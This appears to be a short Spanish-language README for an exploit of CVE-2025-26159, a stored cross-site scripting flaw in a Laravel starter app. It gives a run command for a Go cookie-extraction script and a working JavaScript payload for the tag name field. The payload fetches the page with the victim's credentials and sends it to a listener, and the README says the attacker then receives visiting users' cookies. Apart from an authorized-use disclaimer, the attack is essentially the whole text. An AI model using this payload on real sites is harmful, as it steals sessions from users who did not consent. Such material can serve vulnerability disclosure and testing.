
Este script decodifica, filtra y extrae cookies como parte de la explotación de CVE-2025-26159.
Este script solo puede utilizarse en entornos autorizados donde se haya otorgado permiso explícito. El autor no es responsable de ningún uso indebido, daño o consecuencia derivada del uso de este script.
Este script decodifica, filtra y extrae cookies como parte de la explotación de CVE-2025-26159.
Para comprender los pasos de explotación, consulta esta publicación en mi blog.
go run CVE-2025-26159.go
En el campo de nombre de etiqueta de laravel starter agrega este payload:
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
Después de que un usuario visite la página de detalle de la etiqueta maliciosa, recibirás sus cookies.